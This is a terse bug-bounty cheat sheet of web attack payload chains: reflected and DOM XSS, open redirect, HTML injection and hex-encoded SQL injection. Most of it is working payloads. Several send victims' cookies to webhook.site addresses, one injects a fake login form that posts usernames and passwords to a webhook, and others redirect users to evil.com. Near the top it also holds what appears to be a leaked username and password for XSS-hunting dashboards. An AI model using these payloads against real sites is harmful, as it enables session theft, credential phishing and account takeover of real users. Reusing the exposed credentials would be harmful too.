Bugs Chains
Reflected XSS to Account Take Over
https://xss.report/dashboard
swagpk Synack@3434https://bxsshunter.com/dashboard
Synack@3434python3 -m http.server
'"><img src="x" onerror="document.location='https://webhook.site/7165e251-2ffe-450f-9132-06f74a722e43?cookie='+document.cookie">
'"><img src=x onerror="document.location='https://webhook.site/7165e251-2ffe-450f-9132-06f74a722e43?c='+document.cookie;">
'"><script>document.write('<img src="https://webhook.site/33f747e2-fdb7-468d-b3ae-d114d94e2219?cookie='+document.cookie+'"/>')</script>Open Redirect to DOM XSS
redirectUrl=javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain
redirectUrl=javascript:top[/al/.source+/ert/.source](document.cookie)
redirectUrl=javascript:confirm(document.cookie)
redirectUrl=<>javascript:alert(origin);Open Redirect to Account take Over via Access token
j%09avascript:document.location=%27https://webhook.site/88322504-926e-477c-a16e-5c6ba6b24b7a/%27%2bdocument.cookieReflected XSS to Open Redirect
'"><svg/onload="location.replace('https://evil.com')"
<script>document.location.href="https://evil.com/"</script>
<k AutoFocus contenteditable OnFocus="location.replace('https://evil.com')">DOM XSS to Account Take Over
javascript:document.location=%27https://webhook.site/fd59355e-845b-4462-894a-c6809633adab/%27%2bdocument.cookieHTML Injection to Phishing Steal Credentials to Accont Take Over
'><h3>Please login to proceed</h3> <form action=https://webhook.site/33f747e2-fdb7-468d-b3ae-d114d94e2219>Username:<br><input type="username" name="username"></br>Password:<br><input type="password" name="password"></br><br><input type="submit" value="Login"></br> HTML Injection to Open Redirect
"><meta http-equiv="Refresh" content="0; url='https://evil.com'"/>
SQLI to Open Redirect
0x27223E3C7376672F6F6E6C6F61643D226C6F636174696F6E2E7265706C616365282768747470733A2F2F6576696C2E636F6D272922
0x3C7376672F6F6E6C6F61643D226C6F636174696F6E2E7265706C616365282768747470733A2F2F6F70656E627567626F756E74792E6F7267272922Last updated